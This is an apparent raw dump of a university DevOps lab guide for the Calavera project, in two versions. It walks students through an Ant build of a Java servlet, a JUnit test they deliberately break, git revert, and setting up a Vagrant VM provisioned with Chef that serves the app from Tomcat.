Go:\n\n....\nvagrant@manos:~$ cd \/home\/hijo\/\nvagrant@manos1:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] \t\t\tBuild time is 2016-09-26_01:27:10 UTC (e.g. US CT +6)\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.7 compiled on April 9 2016\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [echo] \t\t Classpath is \/home\/hijo:\/var\/lib\/tomcat8\/lib\/servlet-api.jar:\/usr\/bin\/junit-4.12.jar:\/usr\/bin\/hamcrest-core-1.3.jar\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.041 sec\n\ncompress:\n [jar] Building jar: \/home\/hijo\/target\/CalaveraMain.jar\n\ndeploy:\n [delete] Deleting directory \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [mkdir] Created dir: \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [copy] Copying 1 file to \/var\/lib\/tomcat8\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n [echo] \t\t\tAttempting Tomcat restart.\n [echo]\n [exec] Tomcat started.\n\nmain:\n [echo]\n [echo] \t\t\tbuilt and deployed to Tomcat.\n [echo]\n\nBUILD SUCCESSFUL\nTotal time: 1 second\nvagrant@manos1:\/home\/hijo$\n....\n\n\nYou can see the Ant script at build.xml. Compare that script to the output. It is:\n\n- Running the junit tests (more on that later)\n- Compiling the java *.java files into *.class files\n- Packaging the *.java files into a *.jar file\n- Moving the jar file to the appropriate Tomcat directory, along with the web.xml configuration file\n- Restarting Tomcat\n\nIf you are interested in Ant further, you can see more about it at http:\/\/ant.apache.org\/.\n\n== Changing the application\n\nLet's play with the Java a little bit. 
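The inner loop you will repeat throughout this section is, schematically (a sketch only; the file you edit and the exact output will vary):

....
vagrant@manos:/home/hijo$ nano src/main/java/biz/calavera/MainServlet.java   # edit
vagrant@manos:/home/hijo$ sudo ant                                           # compile, test, deploy
vagrant@manos:/home/hijo$ curl localhost:8080/MainServlet                    # verify
....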
Start by editing the MainServlet.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/MainServlet.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/MainServlet.java Modified\n\npackage biz.calavera;\n\n\/\/package test;\n\nimport java.io.*;\nimport javax.servlet.*;\nimport javax.servlet.http.*;\n\npublic class MainServlet extends HttpServlet {\n \/\/ Import required java libraries\n\n private String message;\n\n public void init() throws ServletException\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n HttpServletResponse response)\n throws ServletException, IOException\n {\n \/\/ Set response content type\n response.setContentType(\"text\/html\");\n\n \/\/ Actual logic goes here.\n PrintWriter out = response.getWriter();\n Class1 oResp = new Class1(message);\n\n out.println(oResp.webMessage());\n }\n\n public void destroy()\n {\n \/\/ do nothing.\n }\n }\n....\n\nFind the line that says:\n\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nand change it to\n\n message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nExit nano and run Ant again:\n\n vagrant@manos:\/home\/hijo$ sudo ant\n [ same output as before ]\n\nNow try:\n\n vagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n <h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n\nIf you did it correctly, you should see that Tomcat (via curl) is now serving up the change you made. Many automated steps were executed between you making that change and it appearing in curl!\n\nNOTE: If you want to see this in firefox, just open a *new* ssh session to SEIS660 with X enabled and don't go into your VM. Remember to use your specific mapped 8080 port number that Vagrant setup.\n\nLet's add it to git:\n....\nvagrant@manos:\/home\/hijo$ git add src\/main\/java\/biz\/calavera\/MainServlet.java\nvagrant@manos:\/home\/hijo$ git commit -m \"my local java\"\n[master 04ff3cb] my local java\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\nNOTE: Git is installed, with a repo initialized already in \/home\/hijo. 
If this were a completely new system, you would need to install git and init the repo.\n\nReview your change:\n\n....\nvagrant@manos:\/home\/hijo$ git log -p -1\ncommit 04ff3cb11264ed3429889512451722c3069b3264\nAuthor: Charles Betz <char@calavera.biz>\nDate: Sun Feb 22 19:44:19 2015 +0000\n\n my local java\n\ndiff --git a\/src\/main\/java\/biz\/calavera\/MainServlet.java b\/src\/main\/java\/biz\/calavera\/MainServlet.java\nindex 35cdac4..54f2be4 100644\n--- a\/src\/main\/java\/biz\/calavera\/MainServlet.java\n+++ b\/src\/main\/java\/biz\/calavera\/MainServlet.java\n@@ -15,7 +15,7 @@ public class MainServlet extends HttpServlet {\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n- message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n+ message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n....\n\nHit `q` to get out of the git review.\n\nNow, let's break something.\n\nReview the test class:\n\n....\nvagrant@manos:\/home\/hijo$ more src\/test\/java\/biz\/calavera\/TestClass1.java\npackage biz.calavera;\n\nimport static org.junit.Assert.*;\n\nimport org.junit.After;\nimport org.junit.AfterClass;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\n\npublic class TestClass1 {\n\n\tprivate Class1 a;\n\n\t@BeforeClass\n\tpublic static void setUpBeforeClass() throws Exception {\n\t}\n\n\t@AfterClass\n\tpublic static void tearDownAfterClass() throws Exception {\n\t}\n\n\t@Before\n\tpublic void setUp() throws Exception {\n\t\t this.a = new Class1(\"TestWebMessage\");\n\t}\n\n\t@After\n\tpublic void tearDown() throws Exception {\n\t}\n\n\t@Test\n\tpublic void testTrue() {\n assertTrue(\"assertTrue test\", true); \/\/ true is true\n assertNotNull(\"a is not null\", this.a); \/\/a exists\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n assertEquals(\"string correctly generated\", \"<h1>TestWebMessage<\/h1>\", this.a.webMessag\ne()); \/\/ string built correctly\n\t}\n\n}\n....\n\nEdit the Class1.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/Class1.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/Class1.java\n\npackage biz.calavera;\n\n\npublic class Class1 {\n String strMsg;\n\n public Class1 (String inString)\n {\n strMsg = inString;\n }\n public String five()\n {\n return \"five\";\n }\n\n public String webMessage()\n {\n return \"<h1>\" + strMsg + \"<\/h1>\";\n }\n\n\n }\n....\n\n\nReplace\n\n return \"five\";\n\nwith\n\n return \"four\";\n\nRebuild with ant:\n\n....\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] 
\t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nBUILD FAILED\n\/home\/hijo\/build.xml:69: Test biz.calavera.TestClass1 failed\n\nTotal time: 1 second\n....\n\nWe got something quite different - a failed build.\n\n\nWe can see the results this way:\n\n....\nvagrant@manos:\/home\/hijo$ cat target\/result.txt\nTestsuite: biz.calavera.TestClass1\nTests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nTestcase: testTrue took 0.012 sec\n\tFAILED\nfive is 5 expected:<f[ive]> but was:<f[our]>\njunit.framework.AssertionFailedError: five is 5 expected:<f[ive]> but was:<f[our]>\n\tat biz.calavera.TestClass1.testTrue(Unknown Source)\n....\n\nNotice we can still curl. The broken build was not deployed to the local Tomcat.\n\n....\nvagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n<h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\n\nWhy did this happen? Go back to the test harness and notice the line:\n\n assertEquals(\"five is 5\", \"five\", this.a.five()); \/\/a.five = \"five\"\n\nNOTE: The `\/\/` in the line above indicates a comment in the Java test.\n\nWhat this says is there is a method (a command or instruction) on TestClass1 called \"five,\" and in fact if it is called it should (unsurprisingly) return EXACTLY the string \"`five`\". No more, no less.\n\nIn terms of the JUnit test language, the test ASSERTS that the method `five` invoked on the object `this.a` (which was constructed out of Class1, as you can see at the start of the test class), will be EQUAL to \"five.\" We purposefully broke the test by telling the method to return \"four\".\n\nTest driven development is a critically important part of building applications and you are encouraged to deepen your familiarity with it. This is the simplest, most basic discussion imaginable.\n\nLet's abandon the changes that \"broke the build\":\n\n vagrant@manos:\/home\/hijo$ git reset --hard\n\nThis command discards all changes you have not committed.\n\nDo\n\n cat src\/main\/java\/biz\/calavera\/Class1.java\n\nand you will see \"four\" reverted to \"five.\"\n\nFinally, let's go back to the original version without YourStudentID in the message:\n\n....\nvagrant@manos:\/home\/hijo$ git log --pretty=short --abbrev-commit\ncommit 3b810e4\nAuthor: Charles Betz <char@calavera.biz>\n\n my local java\n\ncommit b45dc90\nAuthor: Charles Betz <char@calavera.biz>\n\n initial commit\n....\n\nNotice in the above the line:\n\n commit 3b810e4\n\nThe string `3b810e4` is the commit hash. https:\/\/git-scm.com\/book\/en\/v2\/Getting-Started-Git-Basics[More on Git hashing & other topics.]\n\nFind the git commit hash associated with your commit by running `git log --pretty=short --abbrev-commit` as in the example above. Then, run the revert command:\n\n....\nvagrant@manos:\/home\/hijo$ git revert <hash>\n....\n\nNOTE: You will need to edit the revert message in nano. Save and exit.\n\n....\n[master b66c1c9] Revert \"my local java\"\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\n\nSee that \"YourStudentID\" is now removed, as we have reverted to the original version of the code.\n\n....\nvagrant@manos:\/home\/hijo$ cat src\/main\/java\/biz\/calavera\/MainServlet.java\n....\n\nRebuild with ant and check that the original functionality is restored. 
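For example, assuming the revert and the rebuild both succeed, the verification can be collapsed into one hypothetical line that should print the original message:

....
vagrant@manos:/home/hijo$ sudo ant && curl localhost:8080/MainServlet
[ same Ant output as before ]
<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.</h1>
....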
Use Curl again.\n\n\nExit your VM and destroy it:\n\n vagrant@manos:exit\n YourStudentID@serverXXX:~\/Calavera$ vagrant destroy manos -f\n\n\nCongratulations, you have finished another lab. Next up: an end to end DevOps pipeline.\n","old_contents":"= Lab 03 (Technical) The core application practices\n\n== Bringing up the VM\n\n**Overview**\n\nThe purpose of this lab is to give you a realistic, if brief overview of (reasonably) modern application development practices.\n\nLab objectives:\n\nIn this lab, you will work with basic application tools, as an individual developer. You will see test-driven development in action, in a very simple form, with automated build and deployment to a local Tomcat instance.\n\nYou will start by initializing a Vagrant machine that has been preconfigured as a simple developer workstation with:\n\n* https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java]\n* http:\/\/junit.org\/[JUnit]\n* http:\/\/ant.apache.org\/[Ant]\n* http:\/\/tomcat.apache.org\/[Tomcat]\n* https:\/\/git-scm.com\/[git]\n\n**Prerequisites**\n\nYou must have completed lab 2 and issued pull requests for me.\n\n**Clone the Examples repository**\n\nLog into the main server via ssh in the usual way.\n\nMake sure you are in your home directory.\n\n cd ~\n\nInstall the following Vagrant plugin (you do have permissions to do this)\n\n....\nYourStudentID@serverXXX:~$ vagrant plugin install vagrant-berkshelf\nInstalling the 'vagrant-berkshelf' plugin. This can take a few minutes...\nInstalled the plugin 'vagrant-berkshelf (4.0.4)'!\nPost install message from the 'vagrant-berkshelf' plugin:\n\nThe Vagrant Berkshelf plugin requires Berkshelf from the Chef Development Kit.\nYou can download the latest version of the Chef Development Kit from:\n\n https:\/\/downloads.getchef.com\/chef-dk\n\nInstalling Berkshelf via other methods is not officially supported.\n....\n\nClone the Calavera project:\n\n....\nYourStudentID@serverXXX:~$ git clone https:\/\/github.com\/dm-academy\/Calavera.git\nCloning into 'Calavera'...\nremote: Counting objects: 1447, done.\nremote: Compressing objects: 100% (87\/87), done.\nremote: Total 1447 (delta 45), reused 0 (delta 0), pack-reused 1350\nReceiving objects: 100% (1447\/1447), 45.53 MiB | 3.09 MiB\/s, done.\nResolving deltas: 100% (652\/652), done.\nChecking connectivity... done.\n....\nChange to the Calavera directory:\n\n YourStudentID@serverXXX:~$ cd Calavera\/\n\nNow, you will see a new Vagrantfile. Have a look at it:\n\n YourStudentID@serverXXX:~\/Calavera$ more Vagrantfile\n\n(File is lengthy. More only shows you one screen at a time. You can hit the space bar repeatedly to go through it, or q to exit.)\n\nThere are a number of machines defined, such as\n\n\n....\n###############################################################################\n################################### base #################################\n###############################################################################\n....\n\nEach section like that defines how Vagrant should bring up a machine and configure it. There are a number of new commands we haven't seen before. 
Let's focus on the following:\n\n....\n\n###############################################################################\n################################### manos1 ##############################\n###############################################################################\n\n config.vm.define \"manos1\" do | manos1 |\n manos1.vm.host_name =\"manos1.calavera.biz\"\n manos1.vm.network \"private_network\", ip: \"10.1.0.14\"\n manos1.vm.network \"forwarded_port\", guest: 22, host: 2114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 80, host: 8114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 8080, host: 9114, auto_correct: true\n\n manos1.ssh.forward_agent =true\n\n manos1.vm.synced_folder \".\", \"\/home\/manos1\"\n manos1.vm.synced_folder \".\/shared\", \"\/mnt\/shared\"\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\n manos1.vm.provision :chef_zero do |chef|\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n chef.data_bags_path = [\".\/data_bags\/\"]\n chef.nodes_path = [\".\/nodes\/\"]\n chef.roles_path = [\".\/roles\/\"]\n chef.add_recipe \"shared::_apt-update\"\n chef.add_recipe \"git::default\"\n chef.add_recipe \"localAnt::default\"\n chef.add_recipe \"java7::default\" # this is redundant. we already installed this in base and tomcat also installs Java. but won't work w\/o it.\n chef.add_recipe \"localTomcat::v8\"\n chef.add_recipe \"shared::_junit\"\n chef.add_recipe \"manos::default\"\n end\n end\n....\n\nYou used a shell provisioner in your previous lab to apply your script to your new VM. But what's this? This line in the example above\n\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\nis commented out (the # means that Vagrant won't execute that line).\n\nRather than using another provisioner to install software on our VM, we are starting to use Chef. As mentioned in the http:\/\/dm-academy.github.io\/aitm\/#_policy_based_approaches[readings for Session 02], Chef is a configuration management system.\n\nNow, http:\/\/searchaws.techtarget.com\/definition\/Opscode-Chef[read a bit about Chef] and https:\/\/docs.chef.io\/chef_quick_overview.html[a bit more] before you continue.\n\nA full treatment of Chef is beyond the scope of this class. However, you should understand a few things. You should still be in your Calavera directory. 
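One thing worth knowing up front: a Chef recipe is ordinary Ruby code that declares the desired state of the machine, and Chef converges the system towards that state. A minimal hypothetical recipe (the resources below are illustrative, not taken from Calavera) looks like this:

....
# declare a package to install, and a config file to create with set ownership and mode
package "tree"

file "/etc/example.conf" do
  content "managed by Chef\n"
  owner "root"
  mode "0644"
  action :create
end
....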
Run the tree command:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree\n\n\u251c\u2500\u2500 Berksfile\n\u251c\u2500\u2500 Berksfile.lock\n\u251c\u2500\u2500 cookbooks\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 base\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 calaverahosts\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ssh.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _hosts.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _ssh.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 brazos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cara\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cerebro\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 post-receive\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 espina\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 hombros\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 hijoConfig.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 OLD-hijoInit.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 org.jfrog.hudson.ArtifactoryBuilder.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java7\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java8\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localAnt\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 
\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 env.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ant.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localJenkins\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localTomcat\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v6.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 v8.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 manos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 nervios\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 nervios.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 pies\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 pies.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 shared\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _apt-update.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _junit.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u251c\u2500\u2500 data_bags\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 README.txt\n\n(more files)\n....\n\nThe \".rb\" extension indicates the Ruby language, which is used to develop Chef scripts.\n\nTIP: If you are using Putty or some other terminal emulator and getting garbage characters like \u00e2\u00e2\u00e2 in your tree, see http:\/\/unix.stackexchange.com\/questions\/61293\/how-can-i-change-locale-encoding-to-avoid-getting-weird-characters-in-terminal[here].\n\nThis directory structure is the entire Calavera project, which is a simple DevOps simulation that all runs through Vagrant.\n\nExamine the Vagrantfile again (use `cat` or `more`), and notice in the Vagrantfile the directives:\n\n manos.vm.provision :chef_zero do |chef|\n\nThe above tells Vagrant to use Chef to set 
up the virtual machine.\n\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n\nThe above tells Chef where the cookbooks are.\n\n....\nchef.add_recipe \"shared::_apt-update\"\nchef.add_recipe \"git::default\"\nchef.add_recipe \"localAnt::default\"\nchef.add_recipe \"java7::default\"\nchef.add_recipe \"localTomcat::v8\"\nchef.add_recipe \"shared::_junit\"\nchef.add_recipe \"manos::default\"\n\n....\n\nFinally, the above tells Chef to apply a series of recipes from various parts of the tree. These recipes install software and configure the system in various ways.\n\n*Have a look at some of them.* Use \"cat.\"\n\n YourStudentID@serverXXX:~\/Calavera$ cat cookbooks\/localAnt\/recipes\/default.rb\n\nThe combination of these recipes precisely describes what the virtual machine will look like. If you delete a VM and bring it back up, it should look exactly the same every time.\n\nNow, the current Vagrantfile is a little dangerous, because if you type \"vagrant up\" it will try to bring up ALL of the machines. So, I have created a branch in git with a Vagrantfile for just the manos machine. Let's switch to that.\n\nReturn to the Calavera base directory and issue the following commands:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ cd ~\/Calavera\/\nYourStudentID@serverXXX:~\/Calavera$ git checkout Lab-03\nBranch Lab-03 set up to track remote branch Lab-03 from origin.\nSwitched to a new branch 'Lab-03'\n\n....\nNow, do \"cat Vagrantfile\". You should see that Manos is the only machine left.\n\nVagrant up manos:\n\n YourStudentID@serverXXX:~\/Calavera$ vagrant up manos\n\n....\nBringing machine 'manos' up with 'virtualbox' provider...\n==> manos: Box 'opscode-ubuntu-14.04a' could not be found. Attempting to find and install...\n manos: Box Provider: virtualbox\n manos: Box Version: >= 0\n==> manos: Box file was not detected as metadata. Adding it directly...\n==> manos: Adding box 'opscode-ubuntu-14.04a' (v0) for provider: virtualbox\n manos: Unpacking necessary files from: file:\/\/\/var\/vagrant\/boxes\/opscode-ubuntu-14.04a.box\n [more]\n....\n\nIt will take several minutes to launch the new Vagrant instance. In the meantime, YOU NEED TO WATCH THE OUTPUT.\n\nLook for the language \"Fixed port collision\" in a series like this. THE NUMBERS WILL BE DIFFERENT:\n\n....\n==> manos: Fixed port collision for 22 => 2234. Now on port 2201.\n==> manos: Fixed port collision for 80 => 8034. Now on port 2202.\n==> manos: Fixed port collision for 8080 => 8134. Now on port 2203.\n==> manos: Fixed port collision for 22 => 2222. Now on port 2214.\n==> manos: Clearing any previously set network interfaces...\n==> manos: Preparing network interfaces based on configuration...\n manos: Adapter 1: nat\n==> manos: Forwarding ports...\n manos: 22 => 2201 (adapter 1)\n manos: 80 => 2202 (adapter 1)\n manos: 8080 => 2203 (adapter 1)\n manos: 22 => 2214 (adapter 1)\n==> manos: Booting VM...\n....\n\nMAKE NOTE OF THE PORT 8080 MAPPING. In the above, it says \"Now on port 2203.\" You will have a DIFFERENT number. 
